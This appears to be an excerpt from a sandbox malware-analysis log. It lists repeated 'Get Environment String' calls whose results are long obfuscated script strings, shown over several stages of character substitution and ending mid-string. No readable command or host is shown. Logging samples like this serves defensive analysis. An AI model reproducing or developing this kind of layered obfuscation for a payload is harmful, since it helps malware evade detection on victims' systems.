8P:XbGC7y)'7y6TdvwL'InF3pbfPjQIwL7yjU6XmuQI6njU'IqF3pbfN7yPjQI8Ps7yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 s3Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^|GC7yyPj4wLRsh8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%I.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhI37378Pn.Y-8P78P,v%IPjqF3pbfNk7yPjTdI,.Y3QI9`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhI3p8P.Y.Y-7yjU6PjmuQI7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6XmsGC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o |
|
1 | |
| Get Environment String | name = @+*, result_out = s8PGC7ygYgYsvTd]F3pbf6K'gY1gY@sh8PZ7y8P3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2)gY112s2+263pgYF3p2+2]2+2gYqF3pbfN2+28P4-Pj3QI9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8PgY-7Ks2+2s8Pm3QI93p`2+2qF3pbfN6m8PgY967jh`sGC7y8Pm'jU]62+242+2Zng967[2+2F3pbfbfk7yuuQI37s2+26KF3p]gYjh`sGC7y8P2+2m'2+2jU]64Zn2+2g'u2+2ZGC7ym6k7y11F3p]gYqF3pbfN8PGC7y'a2+28P3QI97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7ys8 ,g,gZm6g2+28Ps4ax'Zmg3QI9X2+27',X2+2m,g9 ,gF3pjUn,g2+2g6GC7y4axuQI7ysK_X'2+2k7yng9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p]gYu`2+2GC7y2+28P{PjygY2+24axjUnH [1 '2+2'H)3QI92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7gYZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y'u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y'6wLgY-3QI96n37gYjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2g2+2Pjy8 8 7Kjh7yjU6II'2+26wL8PGC7yjh2+2GC7y]Zng1F3pbfbf2+2k7yuuQI2+2mQI{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYs8P%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93p8P8 8P:XbGC7y)'7y6TdvwL'InF3pbfPjQIwL7yjU6XmuQI6njU'IqF3pbfN7yPjQI8Ps7yjU6RZGC7yy%11TdjhgY8PqF3pbfN7y8 s3Td]7y)'F3pbf6Td38PgYgY)gYgY^^^|GC7yyPj4wLRsh8PZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI37378PngY-8P78P,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3p8PgYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@8PqF3pbfN7y8 7yjU6XmsGC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%gY)gYgY^&^&gYgY,m37'8P7wLgYgYgY,g,gYo637Z/Tgo |
|
1 | |
| Get Environment String | name = [{, result_out = seGC7ygYgYsvTd]F3pbf6K'gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2)gY112s2+263pgYF3p2+2]2+2gYqF3pbfN2+2e4-Pj3QI9heZe,2+2GC7y2+2[2+27K2+23737-%2+2`k7yegY-7Ks2+2sem3QI93p`2+2qF3pbfN6megY967jh`sGC7yem'jU]62+242+2Zng967[2+2F3pbfbfk7yuuQI37s2+26KF3p]gYjh`sGC7ye2+2m'2+2jU]64Zn2+2g'u2+2ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y'a2+2e3QI97yjU62+23pZenGC7y)'2+2Pjk7yenRe6371962+272+2%zwLhGC7yGC7yk7ys8 ,g,gZm6g2+2es4ax'Zmg3QI9X2+27',X2+2m,g9 ,gF3pjUn,g2+2g6GC7y4axuQI7ysK_X'2+2k7yng9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p]gYu`2+2GC7y2+2e{PjygY2+24axjUnH [1 '2+2'H)3QI92+2jh2+2heZo\F3pX]e6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7gYZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s'6wLe2+2GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y'u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y'6wLgY-3QI96n37gYjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+2em'%e72+2GC7y'wL2+2n,X37Zn2+2g2+2Pjy8 8 7Kjh7yjU6II'2+26wLeGC7yjh2+2GC7y]Zng1F3pbfbf2+2k7yuuQI2+2mQI{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'Rek7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H)'Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y)'7y6TdvwL'InF3pbfPjQIwL7yjU6XmuQI6njU'IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y)'F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%gY)gYgY^&^&gYgY,m37'e7wLgYgYgY,g,gYo637Z/Tgo |
|
1 | |
| Get Environment String | name = {@}, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2)gY112s2+263pgYF3p2+2]2+2gYqF3pbfN2+2e4-Pj3QI9heZe,2+2GC7y2+2[2+27K2+23737-%2+2`k7yegY-7Ks2+2sem3QI93p`2+2qF3pbfN6megY967jh`sGC7yem.jU]62+242+2Zng967[2+2F3pbfbfk7yuuQI37s2+26KF3p]gYjh`sGC7ye2+2m.2+2jU]64Zn2+2g.u2+2ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.a2+2e3QI97yjU62+23pZenGC7y).2+2Pjk7yenRe6371962+272+2%zwLhGC7yGC7yk7ys8 ,g,gZm6g2+2es4ax.Zmg3QI9X2+27.,X2+2m,g9 ,gF3pjUn,g2+2g6GC7y4axuQI7ysK_X.2+2k7yng9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p]gYu`2+2GC7y2+2e{PjygY2+24axjUnH [1 .2+2.H)3QI92+2jh2+2heZo\F3pX]e6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7gYZn1 ..H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s.6wLe2+2GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y.6wLgY-3QI96n37gYjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+2em.%e72+2GC7y.wL2+2n,X37Zn2+2g2+2Pjy8 8 7Kjh7yjU6II.2+26wLeGC7yjh2+2GC7y]Zng1F3pbfbf2+2k7yuuQI2+2mQI{ .2+2.2+2jUn2+29 (2+2Pjy)2+2)2).Rek7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo |
|
1 | |
| Get Environment String | name = \{, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'63pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfN6megY967jh`sGC7yem.jU]6'+'4'+'Zng967['+'F3pbfbfk7yuuQI37s'+'6KF3p]gYjh`sGC7ye'+'m.'+'jU]64Zn'+'g.u'+'ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.a'+'e3QI97yjU6'+'3pZenGC7y).'+'Pjk7yenRe637196'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZm6g'+'es4ax.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'g6GC7y4axuQI7ysK_X.'+'k7yng967'+'))['+'F3pbfbfk7yuuQI'+'mQI6KF3p]gYu`'+'GC7y'+'e{PjygY'+'4axjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]e6,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4ax('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7y6KF3pbfbfk7yuuQI37s.6wLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.6wLgY-3QI96n37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjU6II.'+'6wLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3p67yjU6wL1'967'6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo |
|
1 | |
| Get Environment String | name = }],$, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'63pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfN6megY967jh`sGC7yem.jU]6'+'4'+'Zng967['+'F3pbfbfk7yuuQI37s'+'6KF3p]gYjh`sGC7ye'+'m.'+'jU]64Zn'+'g.u'+'ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjU6'+'3pZenGC7y).'+'Pjk7yenRe637196'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZm6g'+'es4Wx.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'g6GC7y4WxuQI7ysK_X.'+'k7yng967'+'))['+'F3pbfbfk7yuuQI'+'mQI6KF3p]gYu`'+'GC7y'+'e{PjygY'+'4WxjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]e6,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4Wx('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7y6KF3pbfbfk7yuuQI37s.6wLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4Wxiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.6wLgY-3QI96n37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjU6II.'+'6wLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3p67yjU6wL1'967'6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4WxH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4WxH6xd4Wx5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo |
|
1 | |
| Get Environment String | name = \[, result_out = seGC7ygYgYsvTd]F3pbfaK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfNamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3pbfbfk7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es4Wx.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y4WxuQI7ysK_X.'+'k7yng9a7'+'))['+'F3pbfbfk7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'4WxjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4Wx('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7yaKF3pbfbfk7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI7axd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4Wxiy+F3pbfbfk7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn bf)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn4WxH).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#bf))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3pbfaRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3pbfPjQIwL7yjUaXmuQIanjU.IqF3pbfN7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbfaTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]a7yjUa%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjUaXmsGC7yye,{Haxd4WxHaxd4Wx5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo |
|
1 | |
| Get Environment String | name = `]$, result_out = seGC7ygYgYsvTd]F3pbfaK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfNamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3pbfbfk7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3pbfbfk7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7yaKF3pbfbfk7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI7axd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H2iy+F3pbfbfk7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn bf)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#bf))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3pbfaRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3pbfPjQIwL7yjUaXmuQIanjU.IqF3pbfN7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbfaTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]a7yjUa%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo |
|
1 | |
| Get Environment String | name = `-$, result_out = seGC7ygYgYsvTd]F3p6aK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3p6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3p6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3p66k7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3p6NeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3p66k7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3p6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3p66k7yuuQI'+'GC7y'+'GC7yaKF3p66k7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3p66k7yuuQI7axd'+'F3p6'+'6k7yuuQI_'+')[F3p66k7yuuQImQI'+'{F3p66k7yuuQI'+'_:H2iy+F3p66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3p66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1F3p66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3p66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn 